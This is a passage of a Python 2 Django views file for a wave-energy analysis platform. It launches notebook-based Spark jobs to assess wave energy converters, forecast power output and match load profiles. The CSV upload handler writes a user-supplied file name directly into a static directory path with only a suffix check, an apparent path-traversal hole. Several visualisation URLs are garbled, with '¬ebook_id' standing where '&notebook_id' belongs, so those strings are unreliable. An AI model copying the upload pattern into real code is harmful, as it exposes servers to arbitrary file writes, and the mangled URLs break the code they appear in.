variable_dict['query_variable'] = _f['select'][0]['name']
variable_dict['title'] = Variable.objects.get(pk=int(_f['type'])).title
variable_dict['unit'] = Variable.objects.get(pk=int(_f['type'])).unit
variable_dict['variable_id'] = _f['type']
return_variables.append(variable_dict)
return return_variables
def get_query_aggregates(query_id, var):
temp_q = TempQuery(document=AbstractQuery.objects.get(pk=query_id).document)
new_from = []
for agg in ['min', 'max', 'avg']:
for _f in temp_q.document['from']:
new_select_list = list()
if int(_f['type']) == int(var['variable_id']):
new_select = dict()
for key in _f['select'][0].keys():
new_select[key] = _f['select'][0][key]
new_select['name'] = new_select['name']
new_select['aggregate'] = agg
new_select_list.append(new_select)
for _s in _f['select'][1:]:
_s['exclude'] = True
# _s['aggregate'] = 'AVG'
_s['groupBy'] = False
_s.pop('joined', None)
new_select_list.append(_s)
new_from.append({'select': new_select_list, 'type': _f['type'], 'name': _f['name']})
else:
for _s in _f['select']:
if _s['type'] == "VALUE":
_s['exclude'] = True
_s['groupBy'] = False
else:
_s['exclude'] = True
# _s['aggregate'] = 'AVG'
_s['groupBy'] = False
new_from.append(_f)
temp_q.document['from'] = new_from
# for _f in temp_q.document['from']:
# if int(_f['type']) == int(var['variable_id']):
# _f['select'][0]['exclude'] = False
# _f['select'][0]['aggregate'] = aggregate
# _f['select'][0]['groupBy'] = False
# for _s in _f['select'][1:]:
# _s['exclude'] = True
# _s['groupBy'] = False
# else:
# for _s in _f['select']:
# _s['exclude'] = True
# _s['groupBy'] = False
results = temp_q.execute()[0]['results']
if len(results) > 0:
result = results[0][0], results[0][1], results[0][2]
else:
result = '-', '-', '-'
return result
def convert_unicode_json(data):
if isinstance(data, basestring):
return str(data)
elif isinstance(data, collections.Mapping):
return dict(map(convert_unicode_json, data.iteritems()))
elif isinstance(data, collections.Iterable):
return type(data)(map(convert_unicode_json, data))
else:
return data
def gather_service_args(service_args, request, service_exec, method='get'):
args_to_note = dict()
for arg in service_args:
if method == 'get':
args_to_note[arg] = request.GET[arg]
else:
args_to_note[arg] = request.POST[arg]
print 'user algorithm args:'
print args_to_note
service_exec.arguments = args_to_note
service_exec.save()
return args_to_note
def get_query_with_updated_filters(request, query_id, method='get'):
# dataset_id = request.GET["dataset_id"]
# original_query_id = settings.LOCATION_EVALUATION_SERVICE_DATASET_QUERY[dataset_id]
query_doc = Query.objects.get(pk=query_id).document
if method == 'get':
query_doc['filters'] = configure_spatial_filter(query_doc['filters'], request.GET["latitude_from"], request.GET["latitude_to"],
request.GET["longitude_from"], request.GET["longitude_to"])
query_doc['filters'] = configure_temporal_filter(query_doc['filters'], request.GET["start_date"], request.GET["end_date"])
else:
query_doc['filters'] = configure_spatial_filter(query_doc['filters'], request.POST["latitude_from"], request.POST["latitude_to"],
request.POST["longitude_from"], request.POST["longitude_to"])
query_doc['filters'] = configure_temporal_filter(query_doc['filters'], request.POST["start_date"], request.POST["end_date"])
print "Updated Filters:"
print query_doc['filters']
new_query = TempQuery(document=query_doc, user=request.user)
new_query.save()
return new_query.id
def clone_service_note(request, service, service_exec):
original_notebook_id = service.notebook_id
if 'notebook_id' in request.GET.keys():
new_notebook_id = request.GET['notebook_id']
else:
new_notebook_id = clone_zep_note(original_notebook_id, "")
service_exec.notebook_id = new_notebook_id
service_exec.save()
print 'Notebook ID: {0}'.format(new_notebook_id)
return new_notebook_id
def create_args_paragraph(request, new_notebook_id, args_to_note, service):
if 'args_paragraph' in request.GET.keys():
new_arguments_paragraph = request.GET['args_paragraph']
else:
new_arguments_paragraph = create_zep_arguments_paragraph(notebook_id=new_notebook_id, title='',
args_json_string=json.dumps(args_to_note))
if service.arguments_paragraph_id is not None:
delete_zep_paragraph(new_notebook_id, service.arguments_paragraph_id)
return new_arguments_paragraph
def create_service_livy_session(request, service_exec):
if 'livy_session' in request.GET.keys():
livy_session = request.GET['livy_session']
else:
# livy_session = run_zep_note(notebook_id=new_notebook_id, exclude=excluded_paragraphs, mode='livy')
livy_session = create_livy_session(service_exec.notebook_id)
service_exec.livy_session = livy_session
service_exec.save()
return livy_session
def execute_service_code(request, service_exec, new_arguments_paragraph, paragraphs):
paragraph_list = [(new_arguments_paragraph, 'gathering user arguments')]
for p in paragraphs:
paragraph_list.append((p['paragraph'], p['status']))
for paragraph, status in paragraph_list:
print 'executing paragraph: ' + paragraph
service_exec.status = status
service_exec.save()
if 'no_exec' in request.GET.keys():
pass
else:
if service_exec.service.through_livy:
run_zep_paragraph(service_exec.notebook_id, paragraph, service_exec.livy_session, 'livy')
else:
run_zep_paragraph(service_exec.notebook_id, paragraph, service_exec.livy_session, 'zeppelin')
def clean_up_new_note(notebook_id, wait_time_seconds=0):
print "waiting to clean up note " + str(notebook_id)
sleep(wait_time_seconds)
print "cleaning up note: " + str(notebook_id)
delete_zep_notebook(notebook_id)
# def wec_creation(request):
# new_wec = request.GET['wec_data'];
# print new_wec
# @never_cache
# def energy_conversion_init(request):
# return render(request, 'wave_energy_pilot/energy_conversion_service.html',
# {'datasets_list': DATASETS,
# 'energy_converters': CONVERTERS})
def wec_creation(request):
new_wec = json.loads(request.GET['wec_data'])
print new_wec
converter = Wave_Energy_Converters(
title=new_wec['title'],
image_uri='',
min_height=new_wec['min_height'],
max_height=new_wec['max_height'],
min_energy_period=new_wec['min_energy_period'],
max_energy_period=new_wec['max_energy_period'],
sample_rows=new_wec['data'],
owner_id=request.user
)
converter.save()
return JsonResponse({'id': converter.id})
def wec_delete(request):
wec_id = int(request.GET['wec_id'])
wec = Wave_Energy_Converters.objects.get(pk=wec_id)
wec.delete()
return JsonResponse({})
@never_cache
def energy_conversion_init(request):
execution_steps = dict()
execution_steps['WEC_LOCATION_EVALUATION_SERVICE'] = ['starting service', 'Initializing Spark Session'] + \
[x['status'] for x in settings.WEC_LOCATION_EVALUATION_SERVICE_PARAGRAPHS] + \
['done']
execution_steps['WEC_GENERATION_FORECAST_SERVICE'] = ['starting service', 'Initializing Spark Session'] + \
[x['status'] for x in settings.WEC_LOCATION_EVALUATION_SERVICE_PARAGRAPHS] + \
['done']
execution_steps['WEC_AREA_EVALUATION_SERVICE'] = ['starting service', 'Initializing Spark Session'] +\
[x['status'] for x in settings.WEC_LOCATION_EVALUATION_SERVICE_PARAGRAPHS] + \
['done']
execution_steps['WEC_LOAD_MATCHING_SERVICE'] = ['starting service', 'Initializing Spark Session'] +\
[x['status'] for x in settings.WEC_LOAD_MATCHING_SERVICE_PARAGRAPHS] + \
['done']
energy_converters_user = Wave_Energy_Converters.objects.filter(owner_id=request.user)
energy_converters_public = Wave_Energy_Converters.objects.filter(owner_id=User.objects.get(username='BigDataOcean'))
energy_converters_all = energy_converters_user | energy_converters_public
for dataset in DATASETS:
try:
service_dataset = Dataset.objects.get(pk=dataset["id"])
print "----------------brhkame dataset"
try:
dataset["min_lat"] = float(service_dataset.spatialSouth)
except:
dataset["min_lat"] = -90
try:
dataset["max_lat"] = float(service_dataset.spatialNorth)
except:
dataset["max_lat"] = 90
try:
dataset["min_lng"] = float(service_dataset.spatialWest)
except:
dataset["min_lng"] = -180
try:
dataset["max_lng"] = float(service_dataset.spatialEast)
except:
dataset["max_lng"] = 180
dataset["min_date"] = service_dataset.temporalCoverageBegin
dataset["max_date"] = service_dataset.temporalCoverageEnd
# print dataset["min_lat"]
# print dataset["max_lat"]
# print dataset["min_lng"]
# print dataset["max_lng"]
# print dataset["min_date"]
# print dataset["max_date"]
if service_dataset.id == 111:
dataset["max_date"] = datetime.now() + timedelta(days=7)
dataset["min_lat"] = 35
dataset["max_lat"] = 45
dataset["min_lng"] = -14
dataset["max_lng"] = -7
except:
print "dataset not found"
return render(request, 'wave_energy_pilot/energy_conversion_service.html',
{'datasets_list': DATASETS,
'energy_converters_user': energy_converters_user,
'energy_converters_public': energy_converters_public,
'energy_converters_all': energy_converters_all,
'data_radius': DATA_RADIUS,
'execution_steps': execution_steps})
@never_cache
def wec_single_location_evaluation_execute(request):
service = Service.objects.get(pk=settings.WEC_LOCATION_EVALUATION_SERVICE_ID)
check_access(request, service)
service_exec = ServiceInstance(service=service, user=request.user, time=datetime.now(),
status="starting service", dataframe_visualizations=[])
service_exec.save()
# Spawn thread to process the data
t = Thread(target=wec_single_location_evaluation_execution_process, args=(request, service_exec.id))
t.start()
return JsonResponse({'exec_instance': service_exec.id})
def wec_single_location_evaluation_execution_process(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
service = Service.objects.get(pk=service_exec.service_id)
# GATHER THE SERVICE ARGUMENTS
service_args = ["start_date", "end_date", "latitude_from", "latitude_to", "longitude_from", "longitude_to", "dataset_id"]
args_to_note = gather_service_args(service_args, request, service_exec)
args_to_note['dataset_table'] = Dataset.objects.get(pk=int(request.GET["dataset_id"])).table_name
converters_selection = request.GET.getlist("converters[]")
wecs = list()
for converter_id in converters_selection:
aWec = dict()
converter = Wave_Energy_Converters.objects.get(pk=int(converter_id))
aWec['name'] = converter.title
aWec['min_H'] = str(int(round(converter.min_height, 0)))
aWec['max_H'] = str(int(round(converter.max_height)))
aWec['min_T'] = str(int(round(converter.min_energy_period)))
aWec['max_T'] = str(int(round(converter.max_energy_period)))
aWec['wec_matrix'] = converter.sample_rows
wecs.append(aWec)
args_to_note['wecs'] = wecs
service_exec.arguments = args_to_note
service_exec.save()
# new conv
# Wave_Energy_Converters(title=conv['title'], owner_id=User.objects.get(pk=4), image_uri='', sample_rows=conv['data'],
# min_height=conv['min_height'], max_height=conv['max_height'], min_energy_period=conv['min_energy_period'],
# max_energy_period=conv['max_energy_period']).save()
# CONFIGURE THE QUERY TO BE USED
dataset_id = str(request.GET["dataset_id"])
query_id = settings.WEC_LOCATION_EVALUATION_SERVICE_DATASET_QUERY[dataset_id]
wave_height_query_id = get_query_with_updated_filters(request, query_id)
# CLONE THE SERVICE NOTE
new_notebook_id = clone_service_note(request, service, service_exec)
# ADD THE VISUALISATIONS TO BE CREATED
visualisations = dict()
power_cols_str = ''
cap_factors_cols_str = ''
unit_list_1 = ''
unit_list_2 = ''
unit_list_3 = ''
for i, converter_id in enumerate(converters_selection):
converter = Wave_Energy_Converters.objects.get(pk=int(converter_id))
power_cols_str += '&y_var[]=power for ' + str(converter.title) + '&y_var_min[]=None&y_var_max[]=None'
unit_list_1 += 'kW,'
cap_factors_cols_str += '&y_var[]=capacity factor for ' + str(converter.title) + '&y_var_min[]=0&y_var_max[]=100'
unit_list_2 += '%,'
cap_factors_cols_str += '&y_var[]=avg(capacity factor for ' + str(converter.title) + ')&y_var_min[]=0&y_var_max[]=100'
unit_list_2 += '%,'
unit_list_1 = unit_list_1[:-1]
power_cols_str += '&y_var_unit=' + unit_list_1
unit_list_2 = unit_list_2[:-1]
cap_factors_cols_str += '&y_var_unit=' + unit_list_2
visualisations['v1'] = ({'notebook_id': new_notebook_id,
'df': 'power_df',
'query': '',
'title': "Generated Power",
'url': "/visualizations/get_line_chart_am/?x_var=time&df=power_df&same_axis=1¬ebook_id=" + str(
new_notebook_id) + power_cols_str,
'done': False})
visualisations['v2'] = ({'notebook_id': new_notebook_id,
'df': 'wec_cap_factors_df',
'query': '',
'title': "Capacity Factor",
'url': "/visualizations/get_line_chart_am/?x_var=time&df=wec_cap_factors_df¬ebook_id=" + str(new_notebook_id) + cap_factors_cols_str,
'done': False})
service_exec.dataframe_visualizations = visualisations
service_exec.save()
# CREATE NEW ARGUMENTS PARAGRAPH
new_arguments_paragraph = create_args_paragraph(request, new_notebook_id, args_to_note, service)
# CREATE A LIVY SESSION
if service.through_livy:
service_exec.status = "Initializing Spark Session"
service_exec.save()
service_exec.livy_session = create_service_livy_session(request, service_exec)
service_exec.save()
try:
# RUN THE SERVICE CODE
execute_service_code(request, service_exec, new_arguments_paragraph, settings.WEC_LOCATION_EVALUATION_SERVICE_PARAGRAPHS)
service_exec.status = "done"
service_exec.save()
try:
dataset_obj = Dataset.objects.get(id=int(dataset_id))
service_obj = service_exec.service
dataset_service_execution(dataset_obj, service_obj)
service_use(service_obj)
unique_service_use(service_obj, request.user)
service_per_user(service_obj, request.user)
nester_statistics(service_obj, dataset_obj)
except:
print 'Dataset or service does not exist'
t = Thread(target=clean_up_new_note, args=(str(new_notebook_id), 180))
t.start()
except Exception as e:
print 'exception in livy execution'
print '%s (%s)' % (e.message, type(e))
service_exec.status = "failed"
service_exec.save()
clean_up_new_note(service_exec.notebook_id)
if 'livy_session' in request.GET.keys():
pass
else:
if service_exec.service.through_livy:
close_livy_session(service_exec.livy_session)
@never_cache
def wec_single_location_evaluation_results(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
# GET THE SERVICE RESULTS
result = get_result_dict_from_livy(service_exec.livy_session, 'result')
print 'result: ' + str(result)
# clean_up_new_note(service_exec.notebook_id)
dataset_id = str(result['dataset_id'])
dataset_title = str(Dataset.objects.get(pk=dataset_id))
location_lat = str(result['location_lat'])
location_lon = str(result['location_lon'])
start_date = str(result['start_date'])
end_date = str(result['end_date'])
converters = [str(name) for name in result['name']]
# SHOW THE SERVICE OUTPUT PAGE
return render(request, 'wave_energy_pilot/wec_location_assessment result.html',
{'result': result,
'back_url': '/wave-energy/energy_conversion/',
'service_title': 'Wave Energy - Assessment of Wave Energy Converters in a Single Location',
'study_conditions': [{'icon': 'fas fa-map-marker-alt', 'text': 'Location (latitude, longitude):','value': '(' + location_lat + ', ' + location_lon + ') +/- ' + str(DATA_RADIUS) + ' degrees'},
{'icon': 'far fa-calendar-alt', 'text': 'Timeframe:','value': 'from ' + str(start_date) + ' to ' + str(end_date)},
{'icon': 'fas fa-database', 'text': 'Dataset used:', 'value': str(dataset_title) + ' <a target="_blank" rel="noopener noreferrer" href="/datasets/' + str(dataset_id) + '/" style="color: #1d567e;text-decoration: underline">(more info)</a>'},
{'icon': 'fas fa-water', 'text': 'WEC technologies:', 'value': str(converters)}],
'no_viz': 'no_viz' in request.GET.keys(),
'visualisations': service_exec.dataframe_visualizations})
@never_cache
def wec_area_evaluation_execute(request):
service = Service.objects.get(pk=settings.WEC_AREA_EVALUATION_SERVICE_ID)
check_access(request, service)
service_exec = ServiceInstance(service=service, user=request.user, time=datetime.now(),
status="starting service", dataframe_visualizations=[])
service_exec.save()
# Spawn thread to process the data
t = Thread(target=wec_area_evaluation_execution_process, args=(request, service_exec.id))
t.start()
return JsonResponse({'exec_instance': service_exec.id})
def wec_area_evaluation_execution_process(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
service = Service.objects.get(pk=service_exec.service_id)
# GATHER THE SERVICE ARGUMENTS
service_args = ["latitude_from", "latitude_to", "longitude_from", "longitude_to", "start_date", "end_date"]
args_to_note = gather_service_args(service_args, request, service_exec)
args_to_note['dataset_table'] = Dataset.objects.get(pk=int(request.GET["dataset_id"])).table_name
converters_selection = request.GET.getlist("converters[]")
wecs = list()
for converter_id in converters_selection:
aWec = dict()
converter = Wave_Energy_Converters.objects.get(pk=int(converter_id))
aWec['name'] = converter.title
aWec['min_H'] = str(int(round(converter.min_height, 0)))
aWec['max_H'] = str(int(round(converter.max_height)))
aWec['min_T'] = str(int(round(converter.min_energy_period)))
aWec['max_T'] = str(int(round(converter.max_energy_period)))
aWec['wec_matrix'] = converter.sample_rows
wecs.append(aWec)
args_to_note['wecs'] = wecs
# args_to_note['dataset_id'] = settings.WEC_GENERATION_FORECAST_SERVICE_DATASET_QUERY.keys()[0]
args_to_note['dataset_id'] = request.GET['dataset_id']
# args_to_note['start_date'] = str(Dataset.objects.get(pk=int(args_to_note['dataset_id'])).temporalCoverageBegin)
# args_to_note['end_date'] = str(Dataset.objects.get(pk=int(args_to_note['dataset_id'])).temporalCoverageEnd)
service_exec.arguments = args_to_note
service_exec.save()
# CONFIGURE THE QUERY TO BE USED
# dataset_id = settings.WEC_AREA_EVALUATION_SERVICE_DATASET_QUERY.keys()[0]
dataset_id = request.GET['dataset_id']
query_id = settings.WEC_AREA_EVALUATION_SERVICE_DATASET_QUERY[dataset_id]
wave_height_query_id = get_query_with_updated_filters(request, query_id)
# CLONE THE SERVICE NOTE
new_notebook_id = clone_service_note(request, service, service_exec)
# ADD THE VISUALISATIONS TO BE CREATED
visualisations = dict()
power_cols_str = ''
cap_factors_cols_str = ''
shut_down_cols_str = ''
for i, converter_id in enumerate(converters_selection):
converter = Wave_Energy_Converters.objects.get(pk=int(converter_id))
power_cols_str += '&contour_var0=power for ' + str(converter.title) + '&contour_var_unit0=kW/m'
cap_factors_cols_str += '&contour_var0=capacity factor for ' + str(converter.title) + '&contour_var_unit0=%'
shut_down_cols_str += '&contour_var0=danger times for ' + str(converter.title) + '&contour_var_unit0=hours'
visualisations['v1'] = ({'notebook_id': new_notebook_id,
'df': 'power_df',
'query': '',
'title': "WEC Average Power Output",
'url': "/visualizations/get_map_visualization/?layer_count=1&viz_id0=20&action0=get_map_contour&n_contours0=50&step0=0.1&agg_func=AVG&lat_col0=i0_latitude&lon_col0=i0_longitude&df0=power_df¬ebook_id0=" + str(new_notebook_id) + power_cols_str,
'done': False})
visualisations['v2'] = ({'notebook_id': new_notebook_id,
'df': 'wec_cap_factors_df',
'query': '',
'title': "WEC Capacity Factor",
'url': "/visualizations/get_map_visualization/?layer_count=1&viz_id0=20&action0=get_map_contour&n_contours0=50&step0=0.1&agg_func=AVG&lat_col0=i0_latitude&lon_col0=i0_longitude&df0=wec_cap_factors_df¬ebook_id0=" + str(new_notebook_id) + cap_factors_cols_str,
'done': False})
visualisations['v3'] = ({'notebook_id': new_notebook_id,
'df': 'danger_times_df',
'query': '',
'title': "Number of Shut Down Hours",
'url': "/visualizations/get_map_visualization/?layer_count=1&viz_id0=20&action0=get_map_contour&n_contours0=50&step0=0.1&agg_func=AVG&lat_col0=i0_latitude&lon_col0=i0_longitude&df0=danger_times_df¬ebook_id0=" + str(new_notebook_id) + shut_down_cols_str,
'done': False})
service_exec.dataframe_visualizations = visualisations
service_exec.save()
# CREATE NEW ARGUMENTS PARAGRAPH
new_arguments_paragraph = create_args_paragraph(request, new_notebook_id, args_to_note, service)
# CREATE A LIVY SESSION
if service.through_livy:
service_exec.status = "Initializing Spark Session"
service_exec.save()
service_exec.livy_session = create_service_livy_session(request, service_exec)
service_exec.save()
try:
# RUN THE SERVICE CODE
execute_service_code(request, service_exec, new_arguments_paragraph, settings.WEC_AREA_EVALUATION_SERVICE_PARAGRAPHS)
service_exec.status = "done"
service_exec.save()
try:
dataset_obj = Dataset.objects.get(id=int(dataset_id))
service_obj = service_exec.service
dataset_service_execution(dataset_obj, service_obj)
service_use(service_obj)
unique_service_use(service_obj, request.user)
service_per_user(service_obj, request.user)
nester_statistics(service_obj, dataset_obj)
except:
print 'Dataset or service does not exist'
t = Thread(target=clean_up_new_note, args=(str(new_notebook_id), 360))
t.start()
except Exception as e:
print 'exception in livy execution'
print '%s (%s)' % (e.message, type(e))
service_exec.status = "failed"
service_exec.save()
# clean_up_new_note(service_exec.notebook_id)
if 'livy_session' in request.GET.keys():
pass
else:
if service_exec.service.through_livy:
close_livy_session(service_exec.livy_session)
@never_cache
def wec_area_evaluation_results(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
# GET THE SERVICE RESULTS
result = get_result_dict_from_livy(service_exec.livy_session, 'result')
print 'result: ' + str(result)
# clean_up_new_note(service_exec.notebook_id)
dataset_id = str(result['dataset_id'])
dataset_title = str(Dataset.objects.get(pk=dataset_id))
latitude_from = str(result['latitude_from'])
latitude_to = str(result['latitude_to'])
longitude_from = str(result['longitude_from'])
longitude_to = str(result['longitude_to'])
start_date = str(result['start_date'])
end_date = str(result['end_date'])
converters = [str(name) for name in result['name']]
# SHOW THE SERVICE OUTPUT PAGE
return render(request, 'wave_energy_pilot/wec_area_assessment result.html',
{'result': result,
'back_url': '/wave-energy/energy_conversion/',
'service_title': 'Wave Energy - Performance of Wave Energy Converter in a Wide Area',
'study_conditions': [{'icon': 'fas fa-map-marker-alt', 'text': 'Location (latitude, longitude):','value': 'from (' + latitude_from + ', ' + longitude_from + ') to (' + latitude_to + ', ' + longitude_to + ')'},
{'icon': 'far fa-calendar-alt', 'text': 'Timeframe:','value': 'from ' + str(start_date) + ' to ' + str(end_date)},
{'icon': 'fas fa-database', 'text': 'Dataset used:', 'value': str(dataset_title) + ' <a target="_blank" rel="noopener noreferrer" href="/datasets/' + str(dataset_id) + '/" style="color: #1d567e;text-decoration: underline">(more info)</a>'},
{'icon': 'fas fa-water', 'text': 'WEC technologies:', 'value': str(converters)}],
'no_viz': 'no_viz' in request.GET.keys(),
'visualisations': service_exec.dataframe_visualizations})
@never_cache
def wec_generation_forecast_execute(request):
service = Service.objects.get(pk=settings.WEC_GENERATION_FORECAST_SERVICE_ID)
check_access(request, service)
service_exec = ServiceInstance(service=service, user=request.user, time=datetime.now(),
status="starting service", dataframe_visualizations=[])
service_exec.save()
# Spawn thread to process the data
t = Thread(target=wec_generation_forecast_execution_process, args=(request, service_exec.id))
t.start()
return JsonResponse({'exec_instance': service_exec.id})
def wec_generation_forecast_execution_process(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
service = Service.objects.get(pk=service_exec.service_id)
# GATHER THE SERVICE ARGUMENTS
service_args = ["start_date", "end_date", "latitude_from", "latitude_to", "longitude_from", "longitude_to"]
args_to_note = gather_service_args(service_args, request, service_exec)
args_to_note['dataset_table'] = Dataset.objects.get(pk=int(request.GET['dataset_id'])).table_name
converters_selection = request.GET.getlist("converters[]")
wecs = list()
for converter_id in converters_selection:
aWec = dict()
converter = Wave_Energy_Converters.objects.get(pk=int(converter_id))
aWec['name'] = converter.title
aWec['min_H'] = str(int(round(converter.min_height, 0)))
aWec['max_H'] = str(int(round(converter.max_height)))
aWec['min_T'] = str(int(round(converter.min_energy_period)))
aWec['max_T'] = str(int(round(converter.max_energy_period)))
aWec['wec_matrix'] = converter.sample_rows
wecs.append(aWec)
args_to_note['wecs'] = wecs
# args_to_note['dataset_id'] = settings.WEC_GENERATION_FORECAST_SERVICE_DATASET_QUERY.keys()[0]
args_to_note['dataset_id'] = request.GET['dataset_id']
service_exec.arguments = args_to_note
service_exec.save()
# CONFIGURE THE QUERY TO BE USED
# dataset_id = settings.WEC_GENERATION_FORECAST_SERVICE_DATASET_QUERY.keys()[0]
dataset_id = request.GET['dataset_id']
query_id = settings.WEC_GENERATION_FORECAST_SERVICE_DATASET_QUERY[dataset_id]
wave_height_query_id = get_query_with_updated_filters(request, query_id)
# CLONE THE SERVICE NOTE
new_notebook_id = clone_service_note(request, service, service_exec)
# ADD THE VISUALISATIONS TO BE CREATED
visualisations = dict()
power_cols_str = ''
unit_list_1 = ''
for i, converter_id in enumerate(converters_selection):
converter = Wave_Energy_Converters.objects.get(pk=int(converter_id))
power_cols_str += '&y_var[]=power for ' + str(converter.title)
unit_list_1 += 'kW,'
unit_list_1 = unit_list_1[:-1]
power_cols_str += '&y_var_unit=' + unit_list_1
visualisations['v1'] = ({'notebook_id': new_notebook_id,
'df': 'power_df',
'query': '',
'title': "Generated Power",
'url': "/visualizations/get_line_chart_am/?x_var=time&df=power_df¬ebook_id=" + str(
new_notebook_id) + power_cols_str,
'done': False})
service_exec.dataframe_visualizations = visualisations
service_exec.save()
# CREATE NEW ARGUMENTS PARAGRAPH
new_arguments_paragraph = create_args_paragraph(request, new_notebook_id, args_to_note, service)
# CREATE A LIVY SESSION
if service.through_livy:
service_exec.status = "Initializing Spark Session"
service_exec.save()
service_exec.livy_session = create_service_livy_session(request, service_exec)
service_exec.save()
try:
# RUN THE SERVICE CODE
execute_service_code(request, service_exec, new_arguments_paragraph, settings.WEC_LOCATION_EVALUATION_SERVICE_PARAGRAPHS)
service_exec.status = "done"
service_exec.save()
try:
dataset_obj = Dataset.objects.get(id=int(dataset_id))
service_obj = service_exec.service
dataset_service_execution(dataset_obj, service_obj)
service_use(service_obj)
unique_service_use(service_obj, request.user)
service_per_user(service_obj, request.user)
nester_statistics(service_obj, dataset_obj)
except:
print 'Dataset or service does not exist'
t = Thread(target=clean_up_new_note, args=(str(new_notebook_id), 180))
t.start()
except Exception as e:
print 'exception in livy execution'
print '%s (%s)' % (e.message, type(e))
service_exec.status = "failed"
service_exec.save()
clean_up_new_note(service_exec.notebook_id)
if 'livy_session' in request.GET.keys():
pass
else:
if service_exec.service.through_livy:
close_livy_session(service_exec.livy_session)
@never_cache
def wec_generation_forecast_results(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
# GET THE SERVICE RESULTS
result = get_result_dict_from_livy(service_exec.livy_session, 'result')
print 'result: ' + str(result)
# clean_up_new_note(service_exec.notebook_id)
dataset_id = str(result['dataset_id'])
dataset_title = str(Dataset.objects.get(pk=dataset_id))
location_lat = str(result['location_lat'])
location_lon = str(result['location_lon'])
start_date = str(result['start_date'])
end_date = str(result['end_date'])
converter = str(result['name'][0])
# SHOW THE SERVICE OUTPUT PAGE
return render(request, 'wave_energy_pilot/wec_generation_forecast result.html',
{'result': result,
'back_url': '/wave-energy/energy_conversion/',
'service_title': 'Wave Energy - Wave Power Generation Forecast',
'study_conditions': [{'icon': 'fas fa-map-marker-alt', 'text': 'Location (latitude, longitude):','value': '(' + location_lat + ', ' + location_lon + ') +/- ' + str(DATA_RADIUS) + ' degrees'},
{'icon': 'far fa-calendar-alt', 'text': 'Timeframe:','value': 'from ' + str(start_date) + ' to ' + str(end_date)},
{'icon': 'fas fa-database', 'text': 'Dataset used:', 'value': str(dataset_title) + ' <a target="_blank" rel="noopener noreferrer" href="/datasets/' + str(dataset_id) + '/" style="color: #1d567e;text-decoration: underline">(more info)</a>'},
{'icon': 'fas fa-water', 'text': 'WEC technology used:', 'value': str(converter)}],
'no_viz': 'no_viz' in request.GET.keys(),
'visualisations': service_exec.dataframe_visualizations})
@never_cache
def wec_load_matching_execute(request):
service = Service.objects.get(pk=settings.WEC_LOAD_MATCHING_SERVICE_ID)
check_access(request, service)
service_exec = ServiceInstance(service=service, user=request.user, time=datetime.now(),
status="starting service", dataframe_visualizations=[])
service_exec.save()
load_profile_csv = request.FILES['load_profile_csv']
if not load_profile_csv.name.endswith('.csv'):
return HttpResponse(status=500)
# Write the file to disk
fout = open('wave_energy_pilot/static/wave_energy_pilot/files/load_matching/' + load_profile_csv.name, 'wb')
for chunk in load_profile_csv.chunks():
fout.write(chunk)
fout.close()
# Spawn thread to process the data
t = Thread(target=wec_load_matching_execution_process, args=(request, service_exec.id))
t.start()
return JsonResponse({'exec_instance': service_exec.id})
def wec_load_matching_execution_process(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
service = Service.objects.get(pk=service_exec.service_id)
try:
# GATHER THE SERVICE ARGUMENTS
service_args = ["start_date", "end_date", "latitude_from", "latitude_to", "longitude_from", "longitude_to", "dataset_id"]
args_to_note = gather_service_args(service_args, request, service_exec, 'post')
args_to_note['dataset_table'] = Dataset.objects.get(pk=int(request.POST['dataset_id'])).table_name
load_profile_csv = request.FILES['load_profile_csv'].name
args_to_note['load_profile_csv'] = load_profile_csv
converters_selection = request.POST.getlist("converters[]")
wecs = list()
for converter_id in converters_selection:
aWec = dict()
converter = Wave_Energy_Converters.objects.get(pk=int(converter_id))
aWec['name'] = converter.title
aWec['min_H'] = str(int(round(converter.min_height, 0)))
aWec['max_H'] = str(int(round(converter.max_height)))
aWec['min_T'] = str(int(round(converter.min_energy_period)))
aWec['max_T'] = str(int(round(converter.max_energy_period)))
aWec['wec_matrix'] = converter.sample_rows
wecs.append(aWec)
args_to_note['wecs'] = wecs
service_exec.arguments = args_to_note
service_exec.save()
# CONFIGURE THE QUERY TO BE USED
dataset_id = request.POST['dataset_id']
query_id = settings.WEC_LOAD_MATCHING_SERVICE_DATASET_QUERY[dataset_id]
wave_height_query_id = get_query_with_updated_filters(request, query_id, 'post')
# CLONE THE SERVICE NOTE
new_notebook_id = clone_service_note(request, service, service_exec)
# ADD THE VISUALISATIONS TO BE CREATED
visualisations = dict()
cols_str = ''
cols_str_norm = ''
unit_list_1 = ''
unit_list_2 = ''
for i, converter_id in enumerate(converters_selection):
converter = Wave_Energy_Converters.objects.get(pk=int(converter_id))
cols_str += '&y_var[]=power for ' + str(converter.title)
cols_str_norm += '&y_var[]=power for ' + str(converter.title) + '_normalized'
unit_list_1 += 'kW,'
unit_list_2 += 'kW,'
unit_list_1 = unit_list_1 + 'kW'
cols_str += '&y_var_unit=' + unit_list_1
unit_list_2 = unit_list_2 + 'kW'
cols_str_norm += '&y_var_unit=' + unit_list_2
cols_str += '&y_var[]=load_profile'
cols_str_norm += '&y_var[]=load_profile_normalized'
visualisations['v1'] = ({'notebook_id': new_notebook_id,
'df': 'power_df',
'query': '',
'title': "Physical units comparison",
'url': "/visualizations/get_line_chart_am/?x_var=time&df=power_df¬ebook_id=" + str(new_notebook_id) + cols_str + "&same_axis=1",
'done': False})
visualisations['v2'] = ({'notebook_id': new_notebook_id,
'df': 'power_norm_df',
'query': '',
'title': "Normalized values comparison",
'url': "/visualizations/get_line_chart_am/?x_var=time&df=power_norm_df¬ebook_id=" + str(new_notebook_id) + cols_str_norm + "&same_axis=1",
'done': False})
service_exec.dataframe_visualizations = visualisations
service_exec.save()
# CREATE NEW ARGUMENTS PARAGRAPH
new_arguments_paragraph = create_args_paragraph(request, new_notebook_id, args_to_note, service)
# CREATE A LIVY SESSION
if service.through_livy:
service_exec.status = "Initializing Spark Session"
service_exec.save()
service_exec.livy_session = create_service_livy_session(request, service_exec)
service_exec.save()
except Exception as e:
print 'exception in preparing execution'
print '%s (%s)' % (e.message, type(e))
service_exec.status = "failed"
service_exec.save()
clean_up_new_note(service_exec.notebook_id)
if 'livy_session' in request.GET.keys():
pass
else:
if service_exec.service.through_livy:
